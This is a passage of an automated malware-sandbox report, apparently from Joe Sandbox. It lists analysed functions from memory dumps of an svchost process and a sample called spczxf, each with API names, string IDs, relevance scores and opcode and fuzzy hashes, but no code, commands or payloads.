                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E51D332705A088AEB9CDF35F84CBAD3796F344F98F158524DA964B788DB79EA41C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07488FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: bbb9a036030e01340ea40a4c7516340e3a0e3b1c94fe781a89a96ebb2bb480f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: F3318B32204A449AE798EF21F84CBAD37A5F340F88F068514EE960B789DB3DEA40C704
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                            • String ID: \\?\
                                                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction ID: 8b1ea791d492e051a6a5f560f98ef01646a3ca082c72ef4237c05654f6186504
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction Fuzzy Hash: C0F04F6270464592EB748F31F9C87996761F748FC8F844026DA894E958DF7CC78ECB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction ID: c083d76f5508533886041f12d92a1c23cca41d73a7765f3a3c8c9015e1b7b179
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF03661311B0581EB589F34F84D3596360EB85FB1F550219DAEA4D2F4DF7CC645C741
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07483044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction ID: f12fd6bcbb6c35ca28e44a02009b8ef21a2d0655591e0f71594d38ad61947dab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction Fuzzy Hash: EEF08C20704B8482EA688F23F90C15D6260EB48FC0F098130EE9A0BB18DF7CC6458700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction ID: ba218e462136e0ae0d89f6177578fb59d82ecd546d7ed8c5677e898f096e6404
                                                                                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B02B936619B8486E7A4CB65F49439EB7A1F3C4B94F104115EACE8BBA8DF7CC554CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07485710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction ID: 98efdaf42cd78f23ef211d68fafc5c1564987426f19ba5f8b501cd8063dedd6d
                                                                                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1461DE36519B48C6E7A4CB65F45835EB7A0F388B94F504116EACD4BBA8DB7CC650CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07494104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: cc7cbdec94dd6148e78b23ef6a47b68351fc70a285df208c7f03a37e316feb49
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C117336A20AD192F66C557DF46F36711416BB8BB8F280624A9F60F7D6CAECCB434200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: f4222f78b70d96197592ca8e623792c41a43029aa6116e0b8cfdaad351544f69
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59614C33600B888AEB54DF75E4843ED77A0F744B88F148216EF891BB99DBB8D695C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: 6f326140f824d1c23eada85b6b96f84b3430e9a5907002ac987915b8b157a9cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: FE517E722006888AEBB88F35A4883AD77A1F754F85F148117DBD94BB95CBBCD691CB01
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07492058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction ID: 94b10e408a37f488d3bf642eb029ef09c09ac234b146ed083a1e6d5d0532412b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                                                                                            • Instruction Fuzzy Hash: FFD10632714A80AAE715CFB9E4443DC3BB1F354BD8F144216CE9D9BB99DAB8C616C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07492980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction ID: 5adeb29f330fca4a1156594d1f9665db67ac8b9b59716915d492ad657bbd9f3e
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591C032B00654A5F768DF75E4883AD2BE0B749F98F144109DE8A6FA95DBFCC686C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07487960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction ID: 10d57091a344b6d224eccc9a068e46721c6e144e3fd294c80a0a8b79bbeff356
                                                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 80112E26715F05C9EB40CF70F8593A933B4F719B58F440E25DAAD4ABA4DB7CC2988380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D0748253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction ID: b9e97d7925e3759d2517def448fe1c886ddc244a2b66becdd97e7cfb7a4b9f8d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: A171813620078986E7A9DE36F8483EE6794F389F84F550026DD8A5BB89DEBDC745C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07482330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction ID: eddba62e07e4cdc55bba6b14f312414a6303fc0a78c3cc64352a63b0f2ef3728
                                                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction Fuzzy Hash: B851E13224478981F6ACDE39B05C3EE6791F385F84F490125DEDA1BB89CABDC7048740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction ID: 116be0df97be36e1e3100e0f1b6f99011b6b0a78985d12dc989f2b70cfdbebec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction Fuzzy Hash: B341C632715A8092DB64DF35F4483AAB7A0F798B94F504121EE8D8B794EBBCC641C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D074894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction ID: e6648f4e339dcfefbd9e1ca43cd78676c46ecc993106961feabe95ddc9340fcb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F111932214B8482EB658F25F44429977E5F788F94F594220EACC0B758DF3CC651CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction ID: eda95c1b707edfd1dbcd35ae1635ab6dcbf081bb3c260b78dd84197f7ea317a9
                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A118C25601B4881EA48DB7AF80926973A1FB89FC0F194029DE8D8B766DF7CCA42D300
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0000023D07481268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000007.00000002.3901166341.0000023D07480000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023D07480000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_23d07480000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction ID: 5097f83e79516eaa2abc6ad1cc3417881597c1d4315db4e273a5deb23e34793f
                                                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8E06D35601604C6EB088F62E80D34A36E1FB89F46F06C024C9890B361DFBDC999C751
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00007FFAAC249DB0 Relevance: 5.7, Strings: 4, Instructions: 727COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: b4_$b4_$b4_$d
                                                                                                                                                                                            • API String ID: 0-794814260
                                                                                                                                                                                            • Opcode ID: f03f0317b3a2158ca0d1044a32f6a8b2384da5d1afadebc935829a9d04e1e422
                                                                                                                                                                                            • Instruction ID: c545620b027cbca01f8a22c98c031b1d91952c14c9821442ff1b66f126328793
                                                                                                                                                                                            • Opcode Fuzzy Hash: f03f0317b3a2158ca0d1044a32f6a8b2384da5d1afadebc935829a9d04e1e422
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75224631A1DE498FF759EF28D48597177E0EF46310B0481B9D48EC729BDE28E84A87C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24ACA0 Relevance: 3.4, Strings: 2, Instructions: 896COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: "+r$qN_^
                                                                                                                                                                                            • API String ID: 0-248909583
                                                                                                                                                                                            • Opcode ID: 299e30b2602ddd066cf252e4ca27fcf892a55b6e759d8e5e0880824678170e06
                                                                                                                                                                                            • Instruction ID: a1c11aa6c7c51e98afc46c3561d56c503cec9c836ec389bfda701752e27230b2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 299e30b2602ddd066cf252e4ca27fcf892a55b6e759d8e5e0880824678170e06
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54423736A096168FFB58FB2CE4415F97791EF86325F00817AD14ECF29AD924E84E87D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24897D Relevance: 3.2, Strings: 2, Instructions: 737COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: b4_$b4_
                                                                                                                                                                                            • API String ID: 0-2776246946
                                                                                                                                                                                            • Opcode ID: c51e00fdcabde89208c6d31f1b5195d1c02b0913f6f3787e8ee009289ddc7922
                                                                                                                                                                                            • Instruction ID: b0d5a015e48f949ad97ce21c66495dd1639070ea7240cc07a480858ff2091911
                                                                                                                                                                                            • Opcode Fuzzy Hash: c51e00fdcabde89208c6d31f1b5195d1c02b0913f6f3787e8ee009289ddc7922
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6922293191DB8A8FE355DB2888515B27BE0FF5231071485BED08FC7697DA29F84AC781
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24B1D1 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
